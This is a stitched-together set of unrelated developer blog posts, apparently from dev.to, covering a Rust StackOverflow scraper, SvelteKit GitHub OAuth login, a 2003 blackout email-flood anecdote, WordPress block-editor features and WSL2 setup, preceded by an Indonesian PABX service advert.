Service Pabx – Teknisi Service Pabx menyediakan Jasa Layanan Pemeliharaan dan perbaikan Pabx, untuk memantau kesehatan Pabx dan untuk mencegah kemungkinan mati total. Pemeliharaan diperlukan memberikan kenyamanan kepada pelanggan karena PABX atau sistem telepon berfungsi dengan maksimal. Ini sangat membantu dalam berkomunikasi dengan klien.
Teknisi Service Pabx
Teknisi Sevice Pabx bertugas memperbaiki system telekomunikasi menjadi lebih mudah digunakan untuk menghubungi klien bisnis diperusahaan anda selain serta memantau status sistem, mencatat semua peristiwa penting, dan segera berkunjung ketempat usaha atau rumah anda. Teknisi Service Pabx siap dipanggil kami siap 24 jam sehari, 7 hari seminggu untuk memastikan permasalahan ini diselesaikan dan siap untuk memastikan sistem telepon bisnis Anda siap untuk bisnis anda.
Wilayah Layanan Service Pabx
Wilayah Layanan Service Pabx adalah sekaran Jabotabek seperti jakarta selatan, jakarta pusat, Jakarta Timur, Jakarta Barat, Jakarta Utara, Bekasi, Bogor, Kerawang, Tangerang dan wilayah Indonesia lainnya
Jasa Pelayanan Teknisi Pabx kami adalah :
Jasa-jasa PABX lainya adalah Jual PABX, Jual Beli PABX, Service PABX, Jasa Service PABX, Setting PABX, Jasa Setting PABX, Program PABX, Jasa Program PABX, Pindah PABX, Jasa Pindah PABX, Tukar Tambah PABX, Pasang PABX, Jasa Pasang PABX, Instalasi PABX, Jasa Instalasi PABX, Bongkar Pasang PABX, Jasa Bongkar Pasang PABX, Jasa Tarik Kabel Telepon, Tarik Kabel Telepon.
Source : https://www.teknisiservicepabx.com/service-pabx/ | jono76 | |
739,866 | Stackoverflow scraping with rust | It will extract the title, question link, answers count, view count, and votes from StackOverflow... | 0 | 2021-06-26T07:12:00 | https://dev.to/chaudharypraveen98/stackoverflow-scraping-with-rust-4624 | rust, scraping, cli, selectrs | It will extract the title, question link, answers count, view count, and votes from StackOverflow depending on the tag parameter and count. This scraper is inspired by [Kadekillary Scarper](https://github.com/kadekillary/scraping-with-rust) with updated libraries and some more features added.
#### Libraries Used
* [Reqwest](https://crates.io/crates/reqwest)
>An ergonomic, batteries-included HTTP Client for Rust.
* [Select](https://crates.io/crates/select)
>A Rust library to extract useful data from HTML documents, suitable for web scraping
* [Clap](https://crates.io/crates/clap)
>A simple-to-use, efficient, and full-featured library for parsing command line arguments and subcommands.
#### Features
* Simple and Fast
* Async get request
* Cli mode
#### How to run
1. Build the executable by `cargo build`
2. Run by `./target/debug/stackoverflow-scraping-with-rust -t <tag> -c <count>`<br>
**< tag >** is the topic from which you want to scrape
**< count >** is the number of posts/threads to be scraped. Note the maximum limit is *16*<br>
Like this
`./target/debug/stackoverflow-scraping-with-rust -t java -c 1`
**What We are going to do?**
<ol>
<li>Getting argument from the command line using Clap library</li>
<li>Make a request using the Reqwest library</li>
<li>Scraping using the Selectrs library</li>
</ol>
#### Libraries Used
* [Reqwest](https://crates.io/crates/reqwest)
>An ergonomic, batteries-included HTTP Client for Rust.
* [Select](https://crates.io/crates/select)
>A Rust library to extract useful data from HTML documents, suitable for web scraping
* [Clap](https://crates.io/crates/clap)
>A simple-to-use, efficient, and full-featured library for parsing command line arguments and subcommands.
**Installing Libraries**
<b>Simple add the following libraries in Cargo.toml</b>
```
[dependencies]
reqwest = { version = "0.10", features = ["json"] }
tokio = { version = "0.2", features = ["full"] }
select = "0.6.0-alpha.1"
clap = "2.33.3"
rand = "0.8.4"
```
**Before moving ahead, We must be aware of CSS selectors**
**What are selectors/locators?**
A <b>CSS Selector</b> is a combination of an element selector and a value that identifies the web element within a web page.
<b>The choice of locator depends largely on your Application Under Test</b>
<b>Id</b>
An element’s id in XPATH is defined using: “[@id='example']” and in CSS using: “#” - ID's must be unique within the DOM.
Examples:
```
XPath: //div[@id='example']
CSS: #example
```
<b>Element Type</b>
The previous example showed //div in the XPath. That is the element type, which could be input for a text box or button, img for an image, or "a" for a link.
```
Xpath: //input or
Css: =input
```
<b>Direct Child</b>
HTML pages are structured like XML, with children nested inside of parents. If you can locate, for example, the first link within a div, you can construct a string to reach it. A direct child in XPATH is defined by the use of a “/“, while on CSS, it’s defined using “>”.
Examples:
```
XPath: //div/a
CSS: div > a
```
<b>Child or Sub-Child</b>
Writing nested divs can get tiring - and result in code that is brittle. Sometimes you expect the code to change, or want to skip layers. If an element could be inside another or one of its children, it’s defined in XPATH using “//” and in CSS just by whitespace.
Examples:
```
XPath: //div//a
CSS: div a
```
<b>Class</b>
For classes, things are pretty similar in XPATH: “[@class='example']” while in CSS it’s just “.”
Examples:
```
XPath: //div[@class='example']
CSS: .example
```
## Step 1 -> Getting argument from the command line using Clap library
We are using the Clap library to get the argument from the command line.
There are three cases: -
<ol>
<li><b>Only tag is provided</b> => We will get only the posts from the input tag with default no of post i.e 16</li>
<li><b>Only count is supplies</b> => We will get only input number of post from any random topic using the Rand library</li>
<li><b>Both count and tag</b> => We will get input number of post of input tag</li>
</ol>
First, we initialize the command line app names StackOverflow Scraper. Then mention all the three cases with their short and long name.
```
fn main() {
let matches = App::new("StackOverflow Scraper")
.version("1.0")
.author("Praveen Chaudhary <chaudharypraveen98@gmail.com>")
.about("It will scrape questions from StackOverflow depending on the tag.")
.arg(
Arg::with_name("tag")
.short("t")
.long("tag")
.takes_value(true)
.help("takes the tag and scrape according to this"),
)
.arg(
Arg::with_name("count")
.short("c")
.long("count")
.takes_value(true)
.help("gives n count of posts"),
)
.get_matches();
....
....
```
Once we have mentioned all the cases. Now we need to extract the argument value using the match which helps us to find a particular pattern
```
fn main() {
.....
.....
if matches.is_present("tag") && matches.is_present("count") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
stackoverflow_post(&url, count as usize);
} else if matches.is_present("tag") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
stackoverflow_post(&url, 16);
} else if matches.is_present("count") {
let url = get_random_url();
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
stackoverflow_post(&url, count as usize);
} else {
let url = get_random_url();
stackoverflow_post(&url, 16);
}
}
```
In the above code, we have used the <tt>stackoverflow_post</tt> function. We will learn about this in <b>Step 3</b>
## Step 2 -> Make a request using the Reqwest library
We will use the reqwest library to make a get request to the StackOverflow website customized with the input tag
```
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
let resp = reqwest::get(url).await?;
....
```
## Step 3 -> Scraping using the Selectrs library
We will use the CSS selectors to get the question post from the StackOverflow
```
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
.....
.....
let document = Document::from(&*resp.text().await?);
for node in document.select(Class("s-post-summary")).take(count) {
let question = node
.select(Class("s-post-summary--content-excerpt"))
.next()
.unwrap()
.text();
let title_element = node
.select(Class("s-post-summary--content-title").child(Name("a")))
.next()
.unwrap();
let title = title_element.text();
let question_link = title_element.attr("href").unwrap();
let stats = node
.select(Class("s-post-summary--stats-item-number"))
.map(|stat| stat.text())
.collect::<Vec<_>>();
let votes = &stats[0];
let answer = &stats[1];
let views = &stats[2];
let tags = node
.select(Class("post-tag"))
.map(|tag| tag.text())
.collect::<Vec<_>>();
println!("Question => {}", question);
println!(
"Question-link => https://stackoverflow.com{}",
question_link
);
println!("Question-title => {}", title);
println!("Votes => {}", votes);
println!("Views => {}", views);
println!("Tags => {}", tags.join(" ,"));
println!("Answers => {}", answer);
println!("-------------------------------------------------------------\n");
}
Ok(())
}
```
## Complete Code
```
extern crate clap;
extern crate reqwest;
extern crate select;
extern crate tokio;
use clap::{App, Arg};
use rand::seq::SliceRandom;
use select::document::Document;
use select::predicate::{Attr, Class, Name, Or, Predicate};
fn main() {
let matches = App::new("StackOverflow Scraper")
.version("1.0")
.author("Praveen Chaudhary <chaudharypraveen98@gmail.com>")
.about("It will scrape questions from stackoverflow depending on the tag.")
.arg(
Arg::with_name("tag")
.short("t")
.long("tag")
.takes_value(true)
.help("takes the tag and scrape according to this"),
)
.arg(
Arg::with_name("count")
.short("c")
.long("count")
.takes_value(true)
.help("gives n count of posts"),
)
.get_matches();
if matches.is_present("tag") && matches.is_present("count") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
hacker_news(&url, count as usize);
} else if matches.is_present("tag") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
hacker_news(&url, 16);
} else if matches.is_present("count") {
let url = get_random_url();
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
hacker_news(&url, count as usize);
} else {
let url = get_random_url();
hacker_news(&url, 16);
}
}
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
let resp = reqwest::get(url).await?;
// println!("body = {:?}", resp.text().await?);
// assert!(resp.status().is_success());
let document = Document::from(&*resp.text().await?);
for node in document.select(Class("s-post-summary")).take(count) {
let question = node
.select(Class("s-post-summary--content-excerpt"))
.next()
.unwrap()
.text();
let title_element = node
.select(Class("s-post-summary--content-title").child(Name("a")))
.next()
.unwrap();
let title = title_element.text();
let question_link = title_element.attr("href").unwrap();
let stats = node
.select(Class("s-post-summary--stats-item-number"))
.map(|stat| stat.text())
.collect::<Vec<_>>();
let votes = &stats[0];
let answer = &stats[1];
let views = &stats[2];
let tags = node
.select(Class("post-tag"))
.map(|tag| tag.text())
.collect::<Vec<_>>();
println!("Question => {}", question);
println!(
"Question-link => https://stackoverflow.com{}",
question_link
);
println!("Question-title => {}", title);
println!("Votes => {}", votes);
println!("Views => {}", views);
println!("Tags => {}", tags.join(" ,"));
println!("Answers => {}", answer);
println!("-------------------------------------------------------------\n");
}
Ok(())
}
// Getting random tag
fn get_random_url() -> String {
let default_tags = vec!["python", "rust", "c#", "android", "html", "javascript"];
let random_tag = default_tags.choose(&mut rand::thread_rng()).unwrap();
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
random_tag
);
url.to_string()
}
```
## How to run our scraper?
<ol>
<li>Build the executable by <code>cargo build</code></li>
<li>Run by <code>./target/debug/stackoverflow-scraping-with-rust -t <tag> -c <count></code> < tag > is the topic from which you want to scrape < count > is the number of posts/threads to be scraped. Note the maximum limit is 16. Like this <code>./target/debug/stackoverflow-scraping-with-rust -t java -c 1</code></li>
</ol>
## Deployment
You can deploy on <a href="https://www.heroku.com/">Heroku</a> with the help of <a href="https://circleci.com/">Circle CI</a>
You can read more about on <a href="https://circleci.com/blog/rust-cd/">CircleCI Blog</a>
## Web Preview / Output

<a href="https://drive.google.com/file/d/1SjQ0U1JZF6nn74PgpHDnurwvjEGGl-VH/preview">Google Drive</a>
**Github Link** = > https://github.com/chaudharypraveen98/stackoverflow-scraping-with-rust
| chaudharypraveen98 |
740,082 | Sveltekit Authentication | 🎓Tutorial: What you will learn * How to create an OAuth Application using Github * How to... | 0 | 2021-07-03T11:56:52 | https://hyper-io.medium.com/sveltekit-authentication-3363e086e72c | javascript, authentication, svelte, tutorial | ---
title: Sveltekit Authentication
published: true
date: 2021-06-02 20:50:07 UTC
tags: javascript,authentication,svelte,tutorial
canonical_url: https://hyper-io.medium.com/sveltekit-authentication-3363e086e72c
---
> 🎓Tutorial: What you will learn
>
> \* How to create an OAuth Application using Github
> \* How to redirect requests using SvelteKit
> \* How to handle OAuth Callbacks
> \* How to use the Access Token to get Github User Information
> \* How to store http-only secure cookies using SvelteKit
> \* How to use the hooks middleware in SvelteKit
> \* How to read session information in the SvelteKit client
SvelteKit is the new way to build svelte applications. SvelteKit gives you the ability to run your application on the server and client. With this new approach you have the option to leverage http-only (server-side) cookies to manage authentication state. In this post, we will walk through the process of setting up OAuth authentication using Github and SvelteKit.
#### Prerequisites
What do I need to know for this tutorial?
- Javascript — [https://developer.mozilla.org/en-US/docs/Web/JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript)
- Fetch API — [https://developer.mozilla.org/en-US/docs/Web/API/Fetch\_API/Using\_Fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch)
- NodeJS v14+ — [https://nodejs.org/](https://nodejs.org/en/)
- A Github Account
{% youtube D4ZcbudB1n0 %}
#### Getting Started
Ready, set, go! SvelteKit provides a command-line application that we can use to spin up a new project, the CLI will ask us a bunch of questions, lets step through them. In your terminal create a new folder for this project. Let’s call the project authy or any name you prefer:
```
mkdir authy
cd authy
```
Use the npm init function to create the SvelteKit project
```
npm init svelte@next
```
Let’s go through the questions:
```
create-svelte version 2.0.0-next.73
Welcome to SvelteKit!
This is beta software; expect bugs and missing features.
If you encounter a problem, open an issue on https://github.com/sveltejs/kit/issues if none exists already.
? Directory not empty. Continue? › (y/N) y
? Which Svelte app template? › - Use arrow-keys. Return to submit.
[Choose Skeleton project]
? Use TypeScript? › No / Yes -> No
? Add ESLint for code linting? › No / Yes -> No
? Add Prettier for code formatting? › No / Yes -> No
```
✨ Yay! We just setup SvelteKit
#### Create Github OAuth Application
Go to [https://github.com/settings/applications/new](https://github.com/settings/applications/new) in your browser and create a new application called authy with a homepage of http://localhost:3000 and a callback url of [http://localhost:3000/callback](http://localhost:3000/callback)

Click Register application
You will be redirected to a page that looks similar to this:

In your project directory, create a .env file and in this file take the client id from the github page and add to the .env file as VITE\_CLIENT\_ID and then click the Generate a new client secret then copy the secret and add it to the .env file as VITE\_CLIENT\_SECRET
```
VITE_CLIENT_ID=XXXXXXX
VITE_CLIENT_SECRET=XXXXXXXXXX
```
Save and close your .env file
🎉 you have created a Github OAuth application! Now we can wireup the OAuth application into our project to create a secure workflow.
#### Setup the login button
Setting up the login, we will need to add a button to src/routes/index.svelte and then create a Sveltekit endpoint, this endpoint will perform a redirect to Github for authentication.
src/routes/index.svelte
```
<h1>Welcome to SvelteKit</h1>
<p>Visit <a href="https://kit.svelte.dev">kit.svelte.dev</a> to read the documentation</p>
<a href="/login">
<button>Login using Github</button>
</a>
```
#### Create the /login endpoint
SvelteKit not only leverages the file system to define page routes, SvelteKit leverages the file system to define endpoints as well. In the routes folder or any child folder in the routes folder, if a file ends with the .svelte extension it is a page if the file ends with a .js extension it is an endpoint. Using the exports feature of esm, you can map http verbs to javascript handlers. In our case, we want to create a src/routes/login.js file and map the GET http verb to the exported get function.
```
export async function get(req) {
return {
body: 'Hello'
}
}
```
With the get handler on src/routes/login.js defined, it will take a Request object as input and return a Response object as output. Each of these object types are defined as part of the fetch specification:
- [Fetch](https://fetch.spec.whatwg.org/#request-class)
- [Fetch](https://fetch.spec.whatwg.org/#response-class)
In the SvelteKit documentation you can see them defined as typescript types:
[SvelteKit docs](https://kit.svelte.dev/docs#routing-endpoints)
[Complete documentation for SvelteKit](https://kit.svelte.dev/docs#routing-endpoints)
```
type Headers = Record<string, string>;
type Request<Locals = Record<string, any>, Body = unknown> = {
method: string;
host: string;
headers: Headers;
path: string;
params: Record<string, string>;
query: URLSearchParams;
rawBody: string | Uint8Array;
body: ParameterizedBody<Body>;
locals: Locals; // populated by hooks handle
};
type EndpointOutput = {
status?: number;
headers?: Headers;
body?: string | Uint8Array | JSONValue;
};
type RequestHandler<Locals = Record<string, any>> = (
request: Request<Locals>
) => void | EndpointOutput | Promise<EndpointOutput>;
```
So what do we want to accomplish here?
We want to redirect the request to the github authentication endpoint with our CLIENT\_ID.
In order to respond from the server to the client with a redirect directive, we need to return a 3xx status code, lets use 302 and we need to provide a location in the header. This location should be github oauth authorization location. [https://github.com/login/oauth/authorize](https://github.com/login/oauth/authorize)
src/routes/login.js
```
const ghAuthURL = 'https://github.com/login/oauth/authorize'
const clientId = import.meta.env.VITE_CLIENT_ID
export async function get(req) {
const sessionId = '1234'
return {
status: 302,
headers: {
location: `${ghAuthURL}?client_id=${clientId}&state=${sessionId}`
}
}
}
```
#### Handling the callback
When Github authorizes or does not authorize, Github needs a way to let our application know. This is why we gave Github the callback url. This url is the endpoint we need to create next. Create a new file src/routes/callback.js and in that file provide a get handler.
src/routes/callback.js
```
export async function get(req) {
return {
body: 'callback'
}
}
```
When we redirect the user to Github, Github will ask them to login, then authorize our application. If the user chooses to authorize the application, Github will redirect the browser to our callback endpoint passing with it a code query parameter. We want to use that code query parameter to get an access\_token for the authorized user. Then we will use the access\_token to get the user information from Github.
We can use query.get method off of the request object to get the code value. We can use the fetch function from the node-fetch library to make our request.
```
yarn add node-fetch
```
#### Get access token
src/routes/callback.js
```
import fetch from 'node-fetch'
const tokenURL = 'https://github.com/login/oauth/access_token'
const clientId = import.meta.env.VITE_CLIENT_ID
const secret = import.meta.env.VITE_CLIENT_SECRET
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
return {
body: JSON.stringify(accessToken)
}
}
function getAccessToken(code) {
return fetch(tokenURL, {
method: 'POST',
headers: { 'Content-Type': 'application/json', Accept: 'application/json' },
body: JSON.stringify({
client_id: clientId,
client_secret: secret,
code
})
}).then(r => r.json())
.then(r => r.access_token)
}
```
#### Get user info
```
const userURL = 'https://api.github.com/user'
function getUser(accessToken) {
return fetch(userURL, {
headers: {
Accept: 'application/json',
Authorization: `Bearer ${accessToken}`
}
})
.then(r => r.json())
}
```
#### modify get function
```
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
const user = await getUser(accessToken)
return {
body: JSON.stringify(user)
}
}
```
In our callback handler we should now be seeing the user object! Great Job you have the happy path of Github OAuth working in SvelteKit. But we are not done.
#### Setting a cookie for user session
We need to instruct SvelteKit to write a http-only cookie. This cookie will keep our user session.
#### hooks
We need to create a src/hooks.js file, this file will contain a handle function that will allow us to read cookies and write cookies as it wraps the incoming request for every request.
```
import cookie from 'cookie'
export async function handle({request, resolve}) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happends before the endpoint or page is called
const response = await resolve(request)
// code here happens after the endpoint or page is called
return response
}
```
After the resolve function we want to check and see if the request’s locals object was modified with a user key. If it was, we want to set the cookie with the value.
```
import cookie from 'cookie'
export async function handle({ request, resolve }) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happends before the endpoint or page is called
const response = await resolve(request)
// code here happens after the endpoint or page is called
response.headers['set-cookie'] = `user=${request.locals.user || ''}; Path=/; HttpOnly`
return response
}
```
By setting the cookie with HttpOnly - this will ensure that it can only be written by the server. A cookie will be stored in the browser and remain there until we clear it. So if we want to access the cookie information in any of our page or endpoint handlers we need to parse the cookie and set the value on the request.locals object.
```
import cookie from 'cookie'
export async function handle({ request, resolve }) {
const cookies = cookie.parse(request.headers.cookie || '')
// code here happends before the endpoint or page is called
request.locals.user = cookies.user
console.log({ user: request.locals.user })
const response = await resolve(request)
// code here happens after the endpoint or page is called
response.headers['set-cookie'] = `user=${request.locals.user || ''}; Path=/; HttpOnly`
return response
}
```
#### set the request.locals.user value in callback.js
In src/routes/callback.js we need to set the request.locals.user value with the user.login identifier, which is guaranteed to be unique and it work nicely for this demo.
```
export async function get(req) {
const code = req.query.get('code')
const accessToken = await getAccessToken(code)
const user = await getUser(accessToken)
// this mutates the locals object on the request
// and will be read by the hooks/handle function
// after the resolve
req.locals.user = user.login
return {
status: 302,
headers: {
location: '/'
}
}
}
```
#### Send session information to SvelteKit Load
In the src/hooks.js file we can setup another function called getSession this function will allow us to set a session object to be received by every load function on a SvelteKit page component.
```
export async function getSession(request) {
return {
user: request.locals.user
}
}
```
#### Get session in the script module tag
In our src/routes/index.js page component we are going to add two script tags, the first script tag will be of context module and will run on the server, the second script tag will contain our client side logic for our Svelte Component.
```
<script context="module">
export async function load({ session }) {
return {
props: {
user: session.user,
},
};
}
</script>
<script>
export let user
</script>
<h1>Welcome to SvelteKit</h1>
<p>
Visit <a href="https://kit.svelte.dev">kit.svelte.dev</a> to read the documentation
</p>
{#if user}
<h2>Welcome {user}</h2>
<a href="/logout">
<button>Logout</button>
</a>
{:else}
<a href="/login">
<button>Login using Github</button>
</a>
{/if}
```
We use both script tags to pass the session value from the load function to the client script. This allows us to modify the view based on if the user is present in the session. We are able to show the user login name on the screen.

Sweet! ⚡️
#### Logout
Create a new file called src/routes/logout.js in this file we will create a get endpoint handler function. In this function, we want to set the user equal to null and redirect the request back to the home page.
```
export async function get(req) {
req.locals.user = null
console.log(req.locals.user)
return {
status: 302,
headers: {
location: '/'
}
}
}
```
Now, when you click the logout button, the user is set to an empty string versus the user.login.
#### Protecting pages and endpoints
Now that you have authentication working with Github OAuth, you may want to protect some pages and endpoints. You can perform a test on each page that you want to protect, or you can use the \_\_layout.svelte component and create an accepted list of paths that you would like to protect.
src/routes/\_\_layout.js
```
<script context="module">
export async function load({page, session}) {
if (/^\/admin\/(.*)/.test(page.path) && session.user === '') {
return { redirect: '/', status: 302 }
}
return { props: {} }
}
</script>
<slot />
```
In this example, we are protecting all pages that start with /admin/\* in their path.
#### Summary
That is the end of this little journey my friend, it was a nice trip, hopefully you laughed more than cried, and learned something about SvelteKit. The SvelteKit routing bits are straightforward when you are able to walk through how they work, not much magic, and by setting http-only cookies, you can create simple long lived sessions for your applications. Remember, the information stored in the cookie is not encrypted so do not store any secrets, use a cache or a database if you need to put some more session/user specific data together.
> Demo Repository: [https://github.com/hyper63/tutorial-sveltekit-authentication](https://github.com/hyper63/tutorial-sveltekit-authentication)
#### Sponsored by hyper
If you are building an application and want your application to be:
- Easy to Maintain!
- Easy to Test!
- Without un-intentional Technical Debt
You should check out hyper! [https://hyper.io](https://hyper.io) | hyper |
740,314 | Breaking Production | Recently, an intern at HBO Max mistakenly sent a test email to thousands of users in production.... | 0 | 2021-06-26T19:36:01 | https://davidtruxall.com/breaking-production/ | career | ---
title: Breaking Production
published: true
date: 2021-06-24 15:00:03 UTC
tags: Career
canonical_url: https://davidtruxall.com/breaking-production/
---
Recently, an intern at HBO Max [mistakenly sent a test email to thousands of users in production](https://www.newsweek.com/hbo-max-sparks-jokes-memes-integration-test-email-1601837). Twitter was on fire with memes and jokes, but I found the threads about developers’ experiences breaking production to be much more interesting. Most long-time developers experience the gut-wrenching experience of breaking production, and I’m no different. My story is more complicated than I could get in a Tweet, so I’m telling the story here.
The year was 2003. I was working at a company in the Detroit area migrating a classic ASP application to ASP.Net. The site “just had constant errors” that no one could elaborate on, and needed a thorough overhaul. The company decided to use the need to rewrite code as an opportunity to move to .Net since Microsoft was moving way from Classic ASP at that time. Unfortunately for me, there was no logging in the existing system, and all the exceptions were unhandled so my team had no idea what was breaking or when it was happening. To try and get a grip on the problem, we wrote code to hook into the global error handler and have the server send everyone on the team an email with the error details so we could start to understand the problems and frequency by getting real-time alerts. There were no Sentry.io/Crashlytics/LogRocket services or the like at that time, so we built our own. We were testing this feature, and had not rolled it out to production yet. It was only in our development environment.
The day was August 14, 2003. That afternoon, there was a [severe blackout across the northeastern US](https://en.wikipedia.org/wiki/Northeast_blackout_of_2003). When it was clear the power was not coming back on, the company sent us home. For us the blackout lasted days. And this is where my failure begins.
The system I was working on was backed by an Oracle database, which had a dedicated administrator. The web servers had a different person administering them. During the blackout, the data center, which was located at our facility in Detroit, was running off of generators to keep services available to users outside the blackout area. The database administrator decided to shut down the development database server to conserve energy. But the web server admin kept the development web server running. Unbeknownst to me, the web server admin was running a tool that pinged the home page of the development web site every 8 seconds to make sure it was still alive. Unfortunately, the home page of the web site accessed the database, which was turned off. This caused an unhandled exception on the home page. We already know the site was not handling any exceptions. So the error fired the global exception handler and sent me and my team an email about the error. Every 8 seconds. For two days, because no one on my team was working during the blackout to see the emails.
We returned to the office when power was restored. No one in the company could get email though. That system was still down. Turns out it was down because of my code. The handler sent 56,000 emails during the blackout and filled the disk of the [Novell GroupWise](https://en.wikipedia.org/wiki/GroupWise) email server. Back in 2003 disks were no where near the size we use today. The email administrator was furious. No administrative tool existed for her to remove all those emails. My team had to sit for hours and hours and hours deleting emails using the desktop client. Which was limited to only selecting 100 messages at a time. We certainly did our penance.
You might be thinking that the circumstances of the blackout caused the problem, not really a mistake in the code. But the fault was mine. I should have considered throttling in the error handler. It should have stopped sending the same error message repeatedly. There is no value seeing the same error over and over and over, especially over a short period of time. This was of course the first thing I fixed after deleting all the emails. It’s a hard-earned lesson I’ll never forget.
I may have broken production at other times, but nothing as dramatic and difficult to recover from as this. If you are a junior person reading this, I can assure you that some day your code will break something. But you are not alone, it happens to all of us. I hope your breaks are minor and less consequential, but I know what you are feeling. Feel it and then take that lesson to heart and you’ll become a better developer. | davetrux |
740,414 | WordPress in 2021: new concepts | WordPress evolves. Let's see new features you might not know yet. The old new editor A... | 6,359 | 2021-06-26T23:02:00 | https://dev.to/spo0q/wordpress-in-2021-new-concepts-pfg | wordpress | WordPress evolves. Let's see new features you might not know yet.
## The _old new_ editor
A total revamp of the WordPress editor called "Gutenberg" has been released in 2018 with the 5.0 version. It has replaced the classic TinyMCE editor you may have seen for years in the WordPress admin.
Core developers wanted to revolutionize the entire WordPress publishing and editing experience:
> Gutenberg is a codename for a whole new paradigm in WordPress site building and publishing, that aims to revolutionize the entire publishing experience as much as Gutenberg did the printed word
[Source: WordPress documentation - the block editor](https://developer.wordpress.org/block-editor/).
It seems a large part of users (and developers) were not fully ready for that revolution, though.
Despite the considerable work of contributors who released the new editor as an experimental plugin approximately one year before, the community is still deeply divided about it.
Plugins developers have been creating solutions to circumvent the problem and even disable the entire feature. For example, the [classic editor plugin](https://wordpress.org/plugins/classic-editor/) has more than 5 million active installations in June 2021!
That's massive, and only fools would ignore this fact. While fear of change might be a _tiny, tiny_ part of the explanation, the multiple technical and compatibility issues did not help, not to mention the _deep impact_ on the related ecosystems, especially page builders, but not only.
Anyway, that does not mean you cannot test blocks independently and maybe create great editing experiences for users. In that perspective, there are new concepts you might not know yet.
## What are Gutenberg blocks?
The idea with blocks is to provide pre-defined and pre-styled sections with advanced settings (or not) to make the page creation more fluid and smoother.
Users can now search, install and test third-party WordPress blocks right from the block editor.
It's called [the block directory](https://wordpress.org/plugins/browse/block/). Technically speaking, these "blocks" are small WordPress plugins that only register Gutenberg blocks and associated assets.
Note that the block editor is not only meant for plugin developers. Theme developers can also use it to create advanced styling and functionalities for their users.
The new editor has been developed mainly with JavaScript and React, which offers new perspectives, especially for non-WP/PHP experts.
If you want to dive into block creation [read the documentation](https://developer.wordpress.org/block-editor/). In the next part, we'll see more advanced concepts.
## Reusable blocks
It's one of the best features, IMHO. You can save frequently used blocks for later use in other pages and posts.
It might make content publishing more efficient as users can create their custom library of reusable blocks within the block editor (e.g., email sign-ups, box author, social buttons, etc.).
Users can save advanced formatting and layout for later use.
It's exciting for developers (you can extend it programmatically), and it prevents repetitive work without added value for users.
You can add, edit and remove reusable blocks, but you can also export and import them(JSON format), so the work can be reused from one site to another. It's defined as a post type:
```
/wp-admin/edit.php?post_type=wp_block
```
The only thing that bothers me: there's no direct link in the admin menu! I think it's too bad for such a great feature. You have to edit a post and click on the options menu to get the link called "manage all reusable blocks":

I don't know why it's not featured as it's a great feature, IMHO.
## Block patterns
Theme developers can help users creating engaging layouts with block patterns:

It's like a catalog of various pre-made blocks within the same parent container. There are built-in patterns and custom patterns.
[Source: documentation - block patterns](https://wordpress.org/support/article/block-pattern/)
Users can edit all blocks within a block pattern just like a regular block.
## Global styles and settings (upcoming)
The next release of WordPress (5.8) will introduce global styles and settings. The intent is to override some of the current limitations with blocks: granularity with user permissions, use contexts, theme's flavors, etc.
The current block editor supports styles only for individual blocks. There's no native way to go beyond the context of single pages and posts. With the new upcoming interface, you'll get a higher level of customization.
You can read [the great post by Riad Benguella](https://riad.blog/2021/05/05/introduction-to-wordpresss-global-styles-and-global-settings/) to get all details about this brand new concept.
## Towards Full Site Editing (FSE)
For now, blocks are only available in post edits, but the idea is to make the entire site customizable, including headers, sidebars, and footers.
It's a significant shift in the paradigm. Gutenberg's block model is to be extended to the entire site.
It is not without significance. The core teams want to unify the editing and publishing experience with a new content unit: the block, hence the need for global styles.
As far as I know, developers will have to add new files and directories in themes to enable FSE. For example, the `theme.json` file at the root of the theme folder will be opt-in for a template editor feature.
Themes that do not include this file won't have it.
The template editor will allow for creating and editing block templates for specific posts and pages.
## Wrap up
WordPress continues to aim for the top with more and more granularity in the block editor. The upcoming 5.8 version looks promising, but I must admit I have mixed feelings about the full site editing.
These new functionalities and APIs are quite genius, but I'm not sure of the naming convention. For example, they use generic terms such as "templates" that might be confusing both developers and users.
I also don't understand why pretty cool features such as reusable blocks are not featured in the admin menu.
This Full Site Editing mode seems to go beyond WordPress as a global vision for the next web, but I wonder if ecosystems are ready for it. | spo0q |
740,526 | Building WSL2 Environment for Web Development | This article will not cover all details about every bit. I just want to give what steps needs to be... | 0 | 2021-06-27T04:07:28 | https://dev.to/mefaba/building-wsl2-environment-for-web-development-3ggc | This article will not cover all details about every bit. I just want to give what steps needs to be done for building a wsl2 environment. Therefore I can also come back to this article and do things again.
1)Install WSL2(windows subsystem linux) on your windows.
google>> install wsl2
2)Install Ubuntu on top of WSL2 environment.
google>> install ubuntu wsl
3)Install node for ubuntu.
google>> install nodejs linux
4)Install git for ubuntu
google>>install git wsl
source: [https://docs.microsoft.com/en-us/windows/wsl/tutorials/wsl-git](https://docs.microsoft.com/en-us/windows/wsl/tutorials/wsl-git)
bash>>
```bash
git config --global user.name "Your Name"
git config --global user.email "youremail@email.com"
```
5)Install vscode wsl extensions pack. We will use wsl: remote out of that bunch of extensions..
At this point, when you want to open a folder in WSL you can type `Remote-WSL: Open Folder in WSL` from vscode-command-line-palette(crtrl+shift+P or settings>commandline palette)
6)How to see folders and files inside wsl without using command line. This will be usefull to reach out your project files easily and it will also allow us open our projects on **github destkop.**
